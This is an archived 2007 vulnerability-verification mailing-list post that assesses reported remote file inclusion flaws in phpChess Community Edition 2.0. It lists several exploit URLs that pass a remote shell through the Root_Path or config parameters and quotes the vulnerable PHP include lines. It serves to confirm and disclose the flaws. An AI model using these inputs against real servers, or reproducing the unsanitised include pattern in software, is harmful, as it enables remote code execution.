[VIM] Mostly True: phpChess Community Edition 2.0 RFI
Heinbockel, Bill
heinbockel at mitre.org
Mon May 7 15:59:47 UTC 2007
MILW0RM:3837
BID:23797
# Exploit:[Path]/skins/phpchess/layout_admin_cfg.php?Root_Path=Shell
TRUE: <?php
include($Root_Path."skins/".$SkinName."/admin_header.php");?>
# Exploit:[Path]/skins/phpchess/layout_cfg.php?Root_Path=Shell
TRUE: <?php include($Root_Path."skins/".$SkinName."/header.php");?>
# Exploit:[Path]/skins/phpchess/layout_t_top.php?Root_Path=Shell
TRUE: <?php include($Root_Path."includes/cells/".$Contentpage);?>
# Exploit:[Path]/includes/language.php?config=Shell
FALSE: (included from a function definition called from outside of the
file)
function GetStringFromStringTable($strTag, $config){
include($config);
...
William Heinbockel
Infosec Engineer, Sr.
The MITRE Corporation
202 Burlington Rd. MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615
More information about the VIM
mailing list